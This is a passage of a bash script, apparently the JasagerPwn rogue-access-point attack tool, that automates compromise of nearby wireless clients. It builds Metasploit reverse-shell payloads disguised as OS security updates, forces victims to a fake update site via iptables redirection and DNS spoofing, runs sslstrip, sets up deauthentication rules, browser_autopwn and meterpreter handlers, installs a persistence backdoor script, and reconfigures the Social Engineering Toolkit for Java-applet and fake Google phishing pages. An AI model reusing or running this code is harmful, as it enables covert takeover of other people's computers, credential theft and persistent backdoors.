if [ -e “$Fwww/ubuntu/USN1228.bin” ]; then rm -f “$Fwww/ubuntu/USN1228.bin”; fi

if [ -e “$Fwww/ubuntu/nix.bin” ]; then rm -f “$Fwww/ubuntu/nix.bin”; fi

#xterm -geometry 75x15+10+0 -bg black -fg green -T “[Metasploit Payload] v$version - Metasploit (OSX)” -e “msfpayload osx/x86/shell_reverse_tcp LPORT=$osxPORT LHOST=$fonIP X > $Fwww/osx/SecurityUpdate1-83-90-5.dmg.bin”

xterm -geometry 75x15+10+0 -bg black -fg green -T “[Metasploit Payload] v$version - Metasploit (OSX)” -e “msfpayload osx/x86/shell_reverse_tcp LPORT=$osxPORT LHOST=$fonIP X > $Fwww/osx/osx.bin”

#xterm -geometry 75x15+10+0 -bg black -fg green -T “[Metasploit Payload] v$version - Metasploit (Linux)” -e “msfpayload linux/x86/shell_reverse_tcp LPORT=$nixPORT LHOST=$fonIP X > $Fwww/ubuntu/USN1228.bin”

xterm -geometry 75x15+10+0 -bg black -fg green -T “[Metasploit Payload] v$version - Metasploit (Linux)” -e “msfpayload linux/x86/shell/reverse_tcp LPORT=$nixPORT LHOST=$fonIP X > $Fwww/ubuntu/nix.bin”

sleep .5 && xterm -geometry 110x42+464-38 -bg black -fg green -T “[Metasploit Handler] v$version - Metasploit” -e “msfconsole -r /tmp/msfrcFU” &

echo -e “\e[01;33m[!]\e[00m Forcing LAN to visit our site…”

ipTableRedirect

xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof” -e “killall -9 dnsspoof” &

sleep .5 && xterm -geometry 75x7+0-36 -bg black -fg green -T “[JasagerPwn-DNS Spoof] v$version - DNSSpoof” -e “dnsspoof -i $FONIFACE -f /tmp/jasagerpwn.dns” &

echo -e “\e[01;33m[>]\e[00m Starting Web Server @ $fonIP:80…”

xterm -geometry 75x8+100+0 -T “v$version - Starting Apache2” -e “/etc/init.d/apache2 restart”

service apache2 restart > /dev/null

sleep .5

xterm -geometry 75x8+100+0 -T “v$version - Starting Apache2” -e “ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite fakeupdate && a2enmod php5 && /etc/init.d/apache2 reload”

fakeupdate=”1”

}

#had to add another fuction becuase of the MSF-RC file , probably a more elegant way to approach this.

function updateLoop(){

while true

do

if [ $browserpwn -eq 1 ]; then break; fi

if [ $javaATK -eq 1 ]; then break; fi

echo

echo -e “\e[01;33m[MODE][==========-FakeUpdate Attack-==========][!]\e[00m”

#read -r -p “[?] Enter [I] to give Internet back or [M] for Main Menu: ” USR_CHOICE1

echo -e -n “\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: “

read -e USR_CHOICE96

case $USR_CHOICE96 in

S|s|Stop|stop|1)

xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-IPTABLES] v$version” -e “iptables —table nat —delete PREROUTING —in-interface $FONIFACE”

xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-IPTABLES] v$version” -e “iptables —table nat —delete PREROUTING —in-interface $FONIFACE —jump REDIRECT”

xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-IPTABLES] v$version” -e “iptables —table nat —delete PREROUTING —in-interface $FONIFACE —proto tcp —jump DNAT —to $fonIP”

IPTABLES

xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-DNS Kill] v$version” -e “killall -9 dnsspoof” &

xterm -geometry 75x5+0+94 -bg black -fg green -T “[JasagerPwn-Apache Kill] v$version” -e “/etc/init.d/apache2 stop” &

fakeupdate=”0”

if [ $wasSniffing != “0” ]; then sslstrip ; fi

echo -e “\e[01;33m[!]\e[00m DONT FORGET TO RUN ‘ipconfig /flushdns’ ON VICTIM!!”

break

;;

M|m|Menu|menu|2)

break

;;

*) echo -e “\e[01;31m[!]\e[00m Error: Please Choose From The Menu..”

esac

done

}

while getopts “a:p:i:w:m:s:d:h?uU” OPTIONS; do

case ${OPTIONS} in

a ) autoMetScript=”$OPTARG” ;;

p ) Pport=”$OPTARG” ;;

d ) WiFiMODE=”$OPTARG” ;;

i ) IFACE=”$OPTARG” ;;

w ) WIFACE=”$OPTARG” ;;

h ) help ;;

m ) macMode=”$OPTARG” ;;

s ) fakeMac=”$OPTARG” ;;

u ) update ;;

U ) Fupdate ;;

  ? ) help ;;

* ) echo -e “\e[01;31m[!]\e[00m Error: Unknown Switch Option” 1>&2 ;; # Default

esac

done

ifconfig $WIFACE up && sleep .5

gatewayIP=`route -n | awk ‘/^0.0.0.0/ {getline; print $2}’`

WIFcheck=`ifconfig | grep $WIFACE | awk ‘{ print $1 }’`

IFcheck=`ifconfig | grep $IFACE | awk ‘{ print $1 }’`

ifconfig $FONIFACE $fonIP

#make sure our IP doesnt get screwy from any dhcp..

while true ; do ifconfig $FONIFACE $fonIP && sleep 1 ; done &

ipID=`echo $!`

gatewayIP=`route -n | awk ‘/^0.0.0.0/ {getline; print $2}’`

#check for required interfaces

if [ “$WIFcheck” != “$WIFACE” ]; then

echo -e “\e[01;31m[!]\e[00m FATAL: Cannot Locate $WIFACE…” && exit 0

fi

if [ “$IFcheck” != “$IFACE” ]; then

echo -e “\e[01;31m[!]\e[00m FATAL: Cannot Locate $IFACE…” && exit 0

fi

#——————————————————————————————————————

#=========================-Begin STDOUT-=====================================

clear

echo

echo

#Startup banner

cat “$SPWD/src/resources/banner”

echo

echo -e “\e[01;32m[>]\e[00m Stopping services and programs…”

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing ‘DHCP3 Service’” -e “/etc/init.d/dhcp3-server stop”

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing Sniffing Apps” -e “killall -9 dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf”

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing DNS Spoof” -e “killall -9 dnsspoof”

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing WICD” -e “killall -9 wicd && killall -9 wicd-client”

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing WICD” -e “/etc/init.d/wicd stop”

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing WICD” -e “killall -9 dhclient”

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing WICD” -e “killall -9 dhclient3”

resolvIDs=`ps aux | grep “bash /tmp/resolv” | grep -v grep | awk ‘{ print $2 }’`

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing DriftNET” -e “kill `echo $resolvIDs | awk ‘{ print $1 }’` ; kill `echo $resolvIDs | awk ‘{ print $2 }’` ; kill `echo $resolvIDs | awk ‘{ print $3 }’`” &

echo -e “\e[01;32m[>]\e[00m Checking Environment…”

#Check for root

if [ “$(id -u)” != “0” ]; then echo -e “\e[01;31m[!]\e[00m FATAL: Not Root..” && cleanup ; fi

#Dependencies checks

dhcp3check=`dpkg -l | grep dhcp3-server | awk ‘{print $2}’ | head -n 1`

apache2check=`dpkg -l | grep apache2 | awk ‘{print $2}’ | head -n 1`

apache2phpcheck=`dpkg -l | grep “libapache2-mod-php5” | awk ‘{print $2}’ | head -n 1`

dsniffcheck=`dpkg -l | grep dsniff | awk ‘{print $2}’ | head -n 1`

php5check=`dpkg -l | grep php5 | awk ‘{print $2}’ | head -n 1`

phpPearcheck=`dpkg -l | grep php-pear | awk ‘{print $2}’ | head -n 1`

macchangerCheck=`dpkg -l | grep macchanger | awk ‘{print $2}’ | head -n 1`

aircrackCheck=`dpkg -l | grep aircrack | awk ‘{print $2}’ | head -n 1`

sleep 1

t=”0”

if [ ! $dhcp3check ] || [ ! $apache2check ] || [ ! $apache2phpcheck ] || [ ! $dsniffcheck ] || [ ! $phpPearcheck ] ||[ ! $php5check ] || [ ! $macchangerCheck ] || [ ! -e “/usr/bin/airdrop-ng” ] || [ ! -e $SETpath/src/payloadgen/pefile.py ]; then

echo && echo -e “\e[01;31m[!]\e[00m Some dependencies were not found.. We will try to install them now…” && echo

t=”1”

elif [ ! -e “/usr/local/bin/sslstrip” ] && [ ! -e “/usr/bin/sslstrip” ] && [ $t -eq 0 ]; then

echo && echo -e “\e[01;31m[!]\e[00m Some dependencies were not found.. We will try to install them now…” && echo

elif [ ! $aircrackCheck ] && [ ! -e “/usr/local/bin/aircrack-ng” ] && [ $t -eq 0 ]; then

echo && echo -e “\e[01;31m[!]\e[00m Some dependencies were not found.. We will try to install them now…” && echo

fi

# dhcp3-server check

if [ ! $dhcp3check ]; then

echo -e “\e[01;31m[!]\e[00m No dhcp3-server was detected… Installing..”

xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version - Dependencies Installation” -e “sudo apt-get -y install dhcp3-server && update-rc.d -f dhcp3-server remove”

fi

# dsniff check

if [ ! $dsniffcheck ]; then

echo -e “\e[01;31m[!]\e[00m No Dsniff suite was detected… Installing..”

xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version - Dependencies Installation” -e “sudo apt-get -y install dsniff”

fi

# apache2 check

if [ ! $apache2check ]; then

echo -e “\e[01;31m[!]\e[00m No apache2 server was detected… Installing..”

xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version - Dependencies Installation” -e “sudo apt-get -y install apache2 && update-rc.d -f apache2 remove”

elif [ ! $apache2phpcheck ]; then

echo -e “\e[01;31m[!]\e[00m No apache2 PHP5 module was detected… Installing..”

xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version - Dependencies Installation” -e “sudo apt-get -y install libapache2-mod-php5”

fi

# php5 check

if [ ! $php5check ]; then

echo -e “\e[01;31m[!]\e[00m No PHP5 was detected… Installing..”

xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version - Dependencies Installation” -e “sudo apt-get -y install php5 php5-curl”

fi

# php5pear check

if [ ! $phpPearcheck ]; then

echo -e “\e[01;31m[!]\e[00m No PHP-Pear was detected… Installing..”

xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version - Dependencies Installation” -e “sudo apt-get -y install php-pear”

fi

# macchanger check

if [ ! $macchangerCheck ]; then

echo -e “\e[01;31m[!]\e[00m No Macchanger was detected… Installing..”

xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version - Dependencies Installation” -e “sudo apt-get -y install macchanger”

fi

# aircrack-ng check

if [ ! $aircrackCheck ] && [ ! -e “/usr/local/bin/aircrack-ng” ]; then

echo -e “\e[01;31m[!]\e[00m No Aircrack-ng suite was detected… Installing..”

xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version - Dependencies Installation” -e “sudo apt-get -y install aircrack-ng”

fi

#sslstrip check

if [ ! -e “/usr/local/bin/sslstrip” ] && [ ! -e “/usr/bin/sslstrip” ]; then

xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version - Dependencies Installation” -e “sudo apt-get -y install python-twisted-web python-twisted-web2 linux-headers-`uname -r` build-essential gcc g++”

wget -q -P “/tmp” http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.8.tar.gz

tar xf /tmp/sslstrip-0.8.tar.gz -C “/tmp/” && sleep .5

chmod -R +x /tmp/sslstrip-0.8/*.py

xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version - Dependencies Installation” -e “cd /tmp/sslstrip-0.8/ && python setup.py install”

if [ -d “/tmp/sslstrip-0.8/” ]; then rm -rf /tmp/sslstrip-0.8/ ; fi

fi

#airdrop-ng check

if [ ! -e “/usr/bin/airdrop-ng” ]; then

if [ -e “/pentest/wireless/aircrack-ng/scripts/airdrop-ng/install.py” ]; then

xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version - Dependencies Installation” -e “apt-get -y install linux-headers-$(uname -r) build-essential make patch autoconf python python-dev make patch gettext autoconf python-psyco subversion tcl8.5 openssl zlib1g zlib1g-dev libssh2-1-dev libssl-dev libnl1 libnl-dev libpcap0.8 libpcap0.8-dev python-scapy cracklib-runtime”

chmod +x /pentest/wireless/aircrack-ng/scripts/airdrop-ng/install.py

xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version - Dependencies Installation” -e “cd /pentest/wireless/aircrack-ng/scripts/airdrop-ng/ && python install.py” && sleep .5

xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version - Dependencies Installation” -e “airdrop-ng -u OUIUPDATE”

else

echo -e “\e[01;31m[!]\e[00m Cant Find Airdrop-ng Installer in /pentest.. Ill get it for you now..”

mkdir /pentest/wireless/

wget -q -P “/pentest/wireless/” http://info-s3curity.com/jasagerpwn/airdrop-ng.tar.gz

tar xf “/pentest/wireless/airdrop-ng.tar.gz”

xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version - Dependencies Installation” -e “apt-get -y install linux-headers-$(uname -r) build-essential make patch autoconf python python-dev make patch gettext autoconf python-psyco subversion tcl8.5 openssl zlib1g zlib1g-dev libssh2-1-dev libssl-dev libnl1 libnl-dev libpcap0.8 libpcap0.8-dev python-scapy cracklib-runtime”

chmod +x /pentest/wireless/airdrop-ng/install.py

xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version - Dependencies Installation” -e “cd /pentest/wireless/airdrop-ng/ && python install.py” && sleep .5

xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version - Dependencies Installation” -e “cd airdrop-ng -u OUIUPDATE”

rm -f “/pentest/wireless/airdrop-ng.tar.gz”

fi

fi

#metasploit check

if [ ! -e “$msfpath/msfconsole” ]; then echo && echo -e “\e[01;31m[!]\e[00m ERROR: Metasploit wasnt found in: “$msfpath”” && echo && cleanup; fi

#SET check

if [ ! -e “$SETpath/set-automate” ]; then

echo && echo -e “\e[01;31m[!]\e[00m ERROR: Social Engineering Toolkit wasnt found in: “$SETpath”” && echo && cleanup

else

# python pefile module - thanks redmeat_uk

if [ ! -e “$SETpath/src/payloadgen/pefile.py” ]; then

echo -e “\e[01;31m[!]\e[00m No Python PEfile module was detected… Installing..”

if [ -e “/tmp/pefile-1.2.10-102.tar.gz” ]; then rm -rf /tmp/pefile-1.2.10-102* ; fi

wget -q -P “/tmp” http://pefile.googlecode.com/files/pefile-1.2.10-102.tar.gz

tar xf /tmp/pefile-1.2.10-102.tar.gz -C /tmp/

mv /tmp/pefile-1.2.10-102/pefile.py $SETpath/src/payloadgen/

chmod +x $SETpath/src/payloadgen/pefile.py

if [ -e “$SETpath/src/payloadgen/pefile.py” ]; then

echo -e “\e[01;31m[!]\e[00m Installation Complete!”

elif [ ! -e “$SETpath/src/payloadgen/pefile.py” ]; then

echo -e “\e[01;31m[!]\e[00m Installation Failed!”

fi

if [ -d “/tmp/pefile-1.2.10-102/” ]; then rm -rf /tmp/pefile-1.2.10-102/ ; fi

fi

fi

#Put up monitor interface

monAttempts=”0”

while [ ! $moncheck ];

do

if [ $monAttempts -ge “3” ]; then echo -e “\e[01;31m[!]\e[00m FATAL: Couldn’t Start $MIFACE” && cleanup; fi

moncheck=`ifconfig | grep $MIFACE | awk ‘{print $1}’ | cut -b 4`

xterm -geometry 75x10+464+446 -bg black -fg green -T “JasagerPwn v$version - Start $MIFACE” -e “airmon-ng start $WIFACE”

moncheck=`ifconfig | grep $MIFACE | awk ‘{print $1}’ | cut -b 4`

monAttempts=$(($monAttempts+1))

done

#copy over DNS compatable persistence script for backdoor

if [ ! -e “$msfpath/scripts/meterpreter/persistence_dns.rb” ]; then cp src/resources/persistence_dns.rb “$msfpath/scripts/meterpreter/” ; fi

#cleanup www folders

if [ -d “$Gwww/” ] ; then rm -rf $Gwww/ ; fi

if [ -d “$Jwww/” ] ; then rm -rf $Jwww/ ; fi

if [ -d “$Fwww/” ] ; then rm -rf $Fwww/ ; fi

sleep .5 #Copy over new WWW sites

if [ ! -d “$Jwww” ]; then mkdir $Jwww/ ; fi

if [ ! -d “$Gwww” ]; then mkdir $Gwww/ ; fi

if [ ! -d “$Fwww” ]; then mkdir $Fwww/ ; fi

#backup old default index.html

if [ -e /var/www/index.htm ]; then

mv /var/www/index.htm /var/www/index.htm.OLD

elif [ -e /var/www/index.html ]; then

mv /var/www/index.html /var/www/index.html.OLD

fi

#remove old version stuff

if [ -d “/var/www/pyjasager/” ] ; then rm -rf “/var/www/pyjasager/” ; fi

if [ -e “/etc/apache2/sites-available/pyjasager” ]; then rm -f “/etc/apache2/sites-available/pyjasager” ; fi

#Check for updates

if [ ! $googleRev ]; then

echo -n

elif [ $googleRev -gt $rev ]; then

echo

echo -e “\e[01;31m[!]\e[00m UPDATE: There is an update available!!! Run ./jasagerPwn -u”

echo

elif [ $googleRev -lt $rev ]; then

echo

echo -e “\e[01;31m[!]\e[00m UPDATE: JasagerPwn Revisions have been RESET, Please Re-Download It!”

echo -e “\e[01;31m[!]\e[00m Command: svn checkout http://jasagerpwn.googlecode.com/svn/trunk/ jasager-pwn”

echo

fi

echo -e “\e[01;32m[>]\e[00m Creating scripts…”

#Dynamic line number varaibles incase set_config changes in future updates, which it does and will.

SETapache=`cat $SETpath/config/set_config | grep -n “APACHE_SERVER” | awk -F: ‘{print $1}’`

SETapacheDIR=`cat $SETpath/config/set_config | grep -n “APACHE_DIRECT” | awk -F: ‘{print $1}’`

SETredirect=`cat $SETpath/config/set_config | grep -n “AUTO_REDIRECT” | awk -F: ‘{print $1}’`

SETmetscript=`cat $SETpath/config/set_config | grep -n “METERPRETER_MULTI_SCRIPT” | awk -F: ‘{print $1}’`

SETrepeater=`cat $SETpath/config/set_config | grep -n “JAVA_REPEATER=OFF” | awk -F: ‘{print $1}’`

#SET_CONFIG Text Parsing Variables - for javapwn

APACHESVR=`cat $SETpath/config/set_config | grep “APACHE_SERVER=ON”`

APACHEDIR=`cat $SETpath/config/set_config | grep “/var/www/javapwn”`

meterpreterS=`cat $SETpath/config/set_config | grep “METERPRETER_MULTI_SCRIPT=ON”`

AREDIRECT=`cat $SETpath/config/set_config | grep “AUTO_REDIRECT=OFF”`

JREPEATER=`cat $SETpath/config/set_config | grep “JAVA_REPEATER=ON”`

#backup orignal SET config

if [ ! -e “$SETpath/config/set_config.ORIGINAL” ]; then

cp -f $SETpath/config/set_config $SETpath/config/set_config.ORIGINAL

fi

#Customize SET config to how we want it..

if [ ! “$APACHESVR” ]; then

sed ”${SETapache}’s!APACHE_SERVER=OFF!APACHE_SERVER=ON!g’ $SETpath/config/set_config > $SETpath/config/set_config2

elif [ “$APACHESVR” ]; then

mv $SETpath/config/set_config $SETpath/config/set_config2

fi

sleep 1

if [ ! “$APACHEDIR” ]; then

sed ”${SETapacheDIR}’s!APACHE_DIRECTORY=/var/www!APACHE_DIRECTORY=/var/www/google!g’ $SETpath/config/set_config2 > $SETpath/config/set_config3

elif [ “$APACHEDIR” ]; then

mv $SETpath/config/set_config2 $SETpath/config/set_config3

fi

sleep 1

if [ ! “${AREDIRECT}” ]; then

sed ”${SETredirect}’s!AUTO_REDIRECT=ON!AUTO_REDIRECT=OFF!g’ $SETpath/config/set_config3 > $SETpath/config/set_config4

elif [ “$AREDIRECT” ]; then

mv $SETpath/config/set_config3 $SETpath/config/set_config4

fi

sleep 1

if [ ! “${JREPEATER}” ]; then

sed ”${SETrepeater}’s!JAVA_REPEATER=OFF!JAVA_REPEATER=ON!g’ $SETpath/config/set_config4 > $SETpath/config/set_config5

elif [ “$JREPEATER” ]; then

mv $SETpath/config/set_config4 $SETpath/config/set_config5

fi

sleep 1

if [ “$autoMetScript” -eq “1” ] && [ ! “$JREPEATER” ]; then

sed ”${SETmetscript}’s!METERPRETER_MULTI_SCRIPT=OFF!METERPRETER_MULTI_SCRIPT=ON!g’ $SETpath/config/set_config5 > $SETpath/config/set_config6

elif [ “$autoMetScript” -eq “1” ] && [ “$JREPEATER” ]; then

sed ”${SETmetscript}’s!METERPRETER_MULTI_SCRIPT=OFF!METERPRETER_MULTI_SCRIPT=ON!g’ $SETpath/config/set_config4 > $SETpath/config/set_config5

fi

sleep 1

#move config to right spot

if [ -e “$SETpath/config/set_config6” ]; then

mv $SETpath/config/set_config6 $SETpath/config/set_config

fi

if [ “$autoMetScript” -eq “0” ] && [ -e “$SETpath/config/set_config5” ] ; then

mv $SETpath/config/set_config5 $SETpath/config/set_config

elif [ “$autoMetScript” -eq “1” ] && [ -e “$SETpath/config/set_config5” ] ; then

mv $SETpath/config/set_config5 $SETpath/config/set_config

elif [ “$autoMetScript” -eq “1” ] && [ -e “$SETpath/config/set_config6” ] ; then

mv $SETpath/config/set_config6 $SETpath/config/set_config

fi

sleep 3

#make sure we clean up

if [ -e “$SETpath/config/set_config2” ]; then rm $SETpath/config/set_config2 ; fi

if [ -e “$SETpath/config/set_config3” ]; then rm $SETpath/config/set_config3 ; fi

if [ -e “$SETpath/config/set_config4” ]; then rm $SETpath/config/set_config4 ; fi

if [ -e “$SETpath/config/set_config5” ]; then rm $SETpath/config/set_config5 ; fi

if [ -e “$SETpath/config/set_config6” ]; then rm $SETpath/config/set_config6 ; fi

#Make loop script to isnure our DNS and IP doesnt screw us if we change networks.

cp /etc/resolv.conf /etc/resolv.conf.ORIGINAL

echo “while true ; do echo “nameserver 4.2.2.2” > /etc/resolv.conf && sleep 30 ; done &” > /tmp/resolv.sh

chmod +x /tmp/resolv.sh

bash /tmp/resolv.sh &

dnsID2=`echo $!`

#Parse wwwFakeUpdate pages with our IP for java applet in fake update attack

nixLine=`cat $SPWD/src/wwwFakeUpdate/ubuntu/index.html | grep -n REPLACEMEAPPLET | awk -F: ‘{ print $1 }’`

nixFakeUpdate=`cat $SPWD/src/wwwFakeUpdate/ubuntu/index.html | grep REPLACEMEAPPLET`

osxLine=`cat $SPWD/src/wwwFakeUpdate/osx/index.html | grep -n REPLACEMEAPPLET | awk -F: ‘{ print $1 }’`

osxFakeUpdate=`cat $SPWD/src/wwwFakeUpdate/osx/index.html | grep REPLACEMEAPPLET`

if [ “$nixFakeUpdate” ]; then

sed ”${nixLine}’s!http://REPLACEMEAPPLET/ubuntu/nix.bin!http://’$fonIP’/ubuntu/nix.bin!g’ $SPWD/src/wwwFakeUpdate/ubuntu/index.html > $SPWD/src/wwwFakeUpdate/ubuntu/index.html2

sleep .5 && mv $SPWD/src/wwwFakeUpdate/ubuntu/index.html2 $SPWD/src/wwwFakeUpdate/ubuntu/index.html

fi

if [ “$osxFakeUpdate” ]; then

sed ”${osxLine}’s!http://REPLACEMEAPPLET/osx/osx.bin!http://’$fonIP’/osx/osx.bin!g’ $SPWD/src/wwwFakeUpdate/osx/index.html > $SPWD/src/wwwFakeUpdate/osx/index.html2

sleep .5 && mv $SPWD/src/wwwFakeUpdate/osx/index.html2 $SPWD/src/wwwFakeUpdate/osx/index.html

fi

if [ -e “$SPWD/src/wwwFakeUpdate/ubuntu/index.html2” ]; then rm $SPWD/src/wwwFakeUpdate/ubuntu/index.html2 ; fi

if [ -e “$SPWD/src/wwwFakeUpdate/osx/index.html2” ]; then rm $SPWD/src/wwwFakeUpdate/osx/index.html2 ; fi

#backup original SET templates

if [ -e “$SETpath/src/html/templates/java/index.template” ]; then

mv “$SETpath/src/html/templates/java/index.template” “$SETpath/src/html/templates/java/index.template.ORIGINAL”

cp -rf src/wwwJava/* $SETpath/src/html/templates/java/

else

cp -rf src/wwwJava/* $SETpath/src/html/templates/java/

fi

if [ -e “$SETpath/src/html/templates/google/index.template” ]; then

mv “$SETpath/src/html/templates/google/index.template” “$SETpath/src/html/templates/google/index.template.ORIGINAL”

cp -rf src/wwwGoogle/* $SETpath/src/html/templates/google/

else

cp -rf src/wwwGoogle/* $SETpath/src/html/templates/google/

fi

#Copy over our web templates

cp -rf src/wwwGoogle/* $Gwww/ # google page

cp -rf src/wwwJava/* $Jwww/ # java required page

cp -rf src/wwwFakeUpdate/* $Fwww/ #FakeUpdate Page

#Change ownership of web directories

chown -R www-data:www-data /var/www/

#Airdrop-ng deauth configuration / rules

if [ -e “/tmp/deauth.conf” ] ; then rm “/tmp/deauth.conf” ; fi

echo “# Jasager - deauth.conf v$version

a/$ourAPmac|any

a/00:00:00:00:00:00|any

d/any|any” > /tmp/deauth.conf

#Add our wifi gateway if needed

wifiMAC=`ifconfig $IFACE | grep “HWaddr” | awk ‘{print $5}’ | tr “[a-z]” “[A-Z]”`

if [ $WiFiMODE -eq “1” ]; then

newIFACEmac=`iwconfig $IFACE | grep “Access Point” | awk ‘{print $6}’`

echo “a/$newIFACEmac|$wifiMAC” » /tmp/deauth.conf

fi

# DNS Hosts File. Everything to us.

if [ -e /tmp/jasagerpwn.dns ]; then rm -f /tmp/jasagerpwn.dns; fi

echo “$fonIP *” > /tmp/jasagerpwn.dns

#Vhosts javapwn

vhost=”/etc/apache2/sites-available/javapwn”

if [ -e “$vhost” ] ; then rm “$vhost”; fi

echo “<VirtualHost *:80>

ServerAdmin webmaster@localhost

DocumentRoot $Jwww

<Directory />

Options FollowSymLinks

AllowOverride None

</Directory>

<Directory $Jwww>

Options Indexes FollowSymLinks MultiViews

AllowOverride None

Order allow,deny

allow from all

</Directory>

ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/

<Directory “/usr/lib/cgi-bin”>

AllowOverride None

Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch

Order allow,deny

Allow from all

</Directory>

ErrorLog /var/log/apache2/error.log

# Possible values include: debug, info, notice, warn, error, crit,

# alert, emerg.

LogLevel warn

CustomLog /var/log/apache2/access.log combined

Alias /doc/ “/usr/share/doc/”

<Directory “/usr/share/doc/”>

Options Indexes MultiViews FollowSymLinks

AllowOverride None

Order deny,allow

Deny from all

Allow from 127.0.0.0/255.0.0.0 ::1/128

</Directory>

ErrorDocument 403 /

ErrorDocument 404 /

</VirtualHost>” » $vhost

#Vhosts google

vhost2=”/etc/apache2/sites-available/google”

if [ -e “$vhost2” ] ; then rm “$vhost2”; fi

echo “<VirtualHost *:80>

ServerAdmin webmaster@localhost

DocumentRoot $Gwww

<Directory />

Options FollowSymLinks

AllowOverride None

</Directory>

<Directory $Gwww>

Options Indexes FollowSymLinks MultiViews

AllowOverride None

Order allow,deny

allow from all

</Directory>

ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/

<Directory “/usr/lib/cgi-bin”>

AllowOverride None

Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch

Order allow,deny

Allow from all

</Directory>

ErrorLog /var/log/apache2/error.log

# Possible values include: debug, info, notice, warn, error, crit,

# alert, emerg.

LogLevel warn

CustomLog /var/log/apache2/access.log combined

Alias /doc/ “/usr/share/doc/”

<Directory “/usr/share/doc/”>

Options Indexes MultiViews FollowSymLinks

AllowOverride None

Order deny,allow

Deny from all

Allow from 127.0.0.0/255.0.0.0 ::1/128

</Directory>

ErrorDocument 403 /

ErrorDocument 404 /

</VirtualHost>” » $vhost2

#Vhosts fakeupdate

vhost3=”/etc/apache2/sites-available/fakeupdate”

if [ -e “$vhost3” ] ; then rm “$vhost3”; fi

echo “<VirtualHost *:80>

ServerAdmin webmaster@localhost

DocumentRoot $Fwww

<Directory />

Options FollowSymLinks

AllowOverride None

</Directory>

<Directory $Fwww>

Options Indexes FollowSymLinks MultiViews

AllowOverride None

Order allow,deny

allow from all

</Directory>

ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/

<Directory “/usr/lib/cgi-bin”>

AllowOverride None

Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch

Order allow,deny

Allow from all

</Directory>

ErrorLog /var/log/apache2/error.log

# Possible values include: debug, info, notice, warn, error, crit,

# alert, emerg.

LogLevel warn

CustomLog /var/log/apache2/access.log combined

Alias /doc/ “/usr/share/doc/”

<Directory “/usr/share/doc/”>

Options Indexes MultiViews FollowSymLinks

AllowOverride None

Order deny,allow

Deny from all

Allow from 127.0.0.0/255.0.0.0 ::1/128

</Directory>

ErrorDocument 403 /index.php

ErrorDocument 404 /index.php

</VirtualHost>” » $vhost3

#SET automate scripts, can be TOUCHY.

#run as template rather then imported

if [ -e “/tmp/auto-java2” ] ; then rm “/tmp/auto-java2” ; fi

echo -e “\n2\n1\n1\n1\n2\n16” > /tmp/auto-java2

#run as template rather then imported

if [ -e “/tmp/auto-google2” ] ; then rm “/tmp/auto-google2” ; fi

echo -e “\n2\n1\n1\n3\n2\n16” > /tmp/auto-google2

if [ $autoMetScript -eq 1 ]; then

metScript

#Metasploit rc w/ auto script BP

if [ -e “/tmp/msfrcBP” ] ; then rm “/tmp/msfrcBP” ; fi

echo -e “use auxiliary/server/browser_autopwn

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST $fonIP

set SRVPORT 80

set SRVHOST $fonIP

set URIPATH /

set ExitOnSession false

set InitialAutorunScript multiscript -rc $SETpath/src/program_junk/multi_meter.file

run -j” > /tmp/msfrcBP

#Metasploit rc auto script FU

if [ -e “/tmp/msfrcFU” ] ; then rm “/tmp/msfrcFU” ; fi

echo -e “use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST $fonIP

set LPORT $winPORT

set InitialAutorunScript multiscript -rc $SETpath/src/program_junk/multi_meter.file

set ExitOnSession false

exploit -j

set PAYLOAD osx/x86/shell_reverse_tcp

set LHOST 0.0.0.0

set LPORT $osxPORT

set InitialAutorunScript multiscript -rc $SETpath/src/program_junk/multi_meter.file

set ExitOnSession false

exploit -j

set PAYLOAD linux/x86/shell/reverse_tcp

set LHOST 0.0.0.0

set LPORT $nixPORT

set InitialAutorunScript multiscript -rc $SETpath/src/program_junk/multi_meter.file

set ExitOnSession false

exploit -j” > /tmp/msfrcFU

elif [ $autoMetScript -eq 0 ]; then

#Metasploit rc no auto script BP

if [ -e “/tmp/msfrcBP” ] ; then rm “/tmp/msfrcBP” ; fi

echo -e “use auxiliary/server/browser_autopwn

